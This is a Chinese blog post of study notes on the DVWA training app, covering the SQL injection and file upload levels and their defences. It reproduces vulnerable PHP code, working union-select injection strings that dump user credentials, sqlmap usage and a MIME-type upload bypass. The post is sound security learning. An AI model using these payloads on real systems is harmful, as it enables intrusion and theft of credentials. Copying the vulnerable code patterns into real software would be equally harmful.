重走SQL注入和文件上传

最新推荐文章于 2024-04-06 01:14:12 发布

Pvr1sC

最新推荐文章于 2024-04-06 01:14:12 发布

阅读量482

点赞数

分类专栏：漏洞文章标签： sql php

本文链接：https://blog.csdn.net/m0_51911432/article/details/113418129

版权

漏洞专栏收录该内容

5 篇文章 0 订阅

订阅专栏

主要是在DVWA上做做题

SQL eg

low

php
mysqli_query 如果是执行查询之类的语句( select )，那么会返回一个资源标识符，也就是我们要查找的数据结果集;如果是执行增删改之类的语句，返回的就是true或者false了。
mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组。该函数返回的字段名是区分大小写的。
mysql_num_rows() 函数返回结果集中行的数目。
mysql_result() 函数返回结果集中一个字段的值。
REQUEST作为全局变量

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];//获取id变量

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";//查询firstname和lastname，同时可以看出为字符型SQL注入
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];
        
        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>

medium

我被惊到了还可以这样
f12在value中输入即可
POST

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";//很明显为数字型SQL
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

HIGH

多了个 limit 1好像也没什么了还是换了一个全局变量SESSION

<?php
if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

impossible

添加了is numeric函数


<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

BLIND

在mysql_numrows前加入@可以避免报错

搜索型注入

$id =$GET[‘id’];
$getid = “select first_name,last_name from users where first_name like ‘%$id%’”;
%多个字符 _单个字符
所以可以用输入% 或_爆出所有数据
%’ order by 2#;

注入语句

1’ order by 3#
1’ union select database() #
1’ union select table_name,table_schema from information_schema.tables #
将列表名和数据库名一一对应
users表中的所有列
-1’ union select table_name,column_name from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’#
可以这样合并到一个上但是没有必要，还可以分开显示（即不用group_concat）
-1’ union select group_concat(user),group_concat(password) from dvwa.users #
-1’ union select user,password from dvwa.users#

利用SQLmap进行注入

需要登录注入

用burpsuite抓包获取cookie 在URL后加入–cookie
127.0.0.1是不能被抓包的应用自己的IP地址

post注入

1.通过 –forms参数指定检测对象为一个表单但是比较慢
2. 通过-r参数加载拦截到的数据包信息
将burpsuite拦截的信息装入记事本txt文本并放入sqlmap所在目录
sqlmap.py -r “xxx.txt” -p"username"
参数-r表示sqlmap可以从一个文本文件中获取HTTP请求，这样就可以跳过设置一些其他参数(比如cookie ,POST数据等)。
参数-p表示手工设置想要测试的参数，这里指定测试usernmae参数是否存在注入。

利用os-shell

要求：必须为mssql和mysql，access数据库无效
必须获得网站的物理路径即数据库存储的路径

如何防御SQL注入

SQL注入漏洞的形成原因:
用户构造的语句被代入到数据库中执行。
防御sQL注入的首要原则:
用户的一切输入都是有害的，或是说不被信任的。
防御sQL注入的主要方法:
对用户输入的数据进行过滤。

防御

$id = $_GET[‘id’];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
stripslashes()函数的作用是删除由addslashes()函数添加的反斜杠，也就是去除addslashes()函数的转义。
magic_quotes_gpc魔术引号（在php5.3中删除这一功能）
在PHP配置文件php.ini中存在magic_quotes_gpc选项，被称为魔术引号。
PHP的magic_quotes_gpc被自动设为on。
开启之后，可以对所有的GET、POST和COOKIE传值的数据自动运行addslashes() 函数
在实践中这个魔术引号基本上是关闭的

方法

1.if语句加is_number
2.mysql_real_escape_string() ,addslashes

防范

1.代码层面
1对输入进行严格的转义和过滤;
2.使用参数化查询。（将变量传给参数）
2.网络层面
1通过WAF进行防护;（设置过滤规则）
2.云端防护:安全狗、360、阿里云盾。

函数

mysql_real_recape_string 1函数转义（加反斜杠）单引号，双引号，反斜杠，他与addslashes函数基本一致，但推荐用前者
is_numeric 判断是否为数字

代码层面挖掘SQL注入漏洞

漏洞挖掘主要可以从以下几个方面着手:
代码中负责获取用户数据的变量:$_GET、$_POST、$_COOKIE、$_SERVER
代码中负责执行数据库查询操作的函数:mysql_query()。
·在代码中对这些变量和函数进行搜索跟踪,从而分析是否存在漏洞。

upload

low

$_FILE 上传文件信息
$_FILES[ ‘uploaded’ ][ ‘name’ ]获取原名称
$_FILES[ ‘uploaded’ ][ ‘tmp_name’ ]获取临时名称
basename 函数只要文件名
没有任何保护直接上传


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>

medium

用burp直接绕过就行了修改MIME属性
text/html
text/plan
image/jpeg


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];//获取上传文件的MIME类型
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

HIGH

strrpos 查找字符出现的位置
strrpos( $uploaded_name, ‘.’ ) + 1)查找文件名“.”后的值即截取文件名


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

impossible

对上传文件名字进行加密md5
getimagesize() 函数将测定任何 GIF，JPG，PNG，SWF，SWC，PSD，TIFF，BMP，IFF，JP2，JPX，JB2，JPC，XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

防护

定义白名单
修改上传文件的名字，加密文件名

Pvr1sC

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
重走SQL注入和文件上传

主要是在DVWA上做做题SQL eglowphpmysqli_query 如果是执行查询之类的语句( select )，那么会返回一个资源标识符，也就是我们要查找的数据结果集;如果是执行增删改之类的语句，返回的就是true或者false了。mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组。该函数返回的字段名是区分大小写的。mysql_num_rows() 函数返回结果集中行的数目。mysql_result() 函数返回结果集中一个字段的值。REQUEST作为全局
复制链接

扫一扫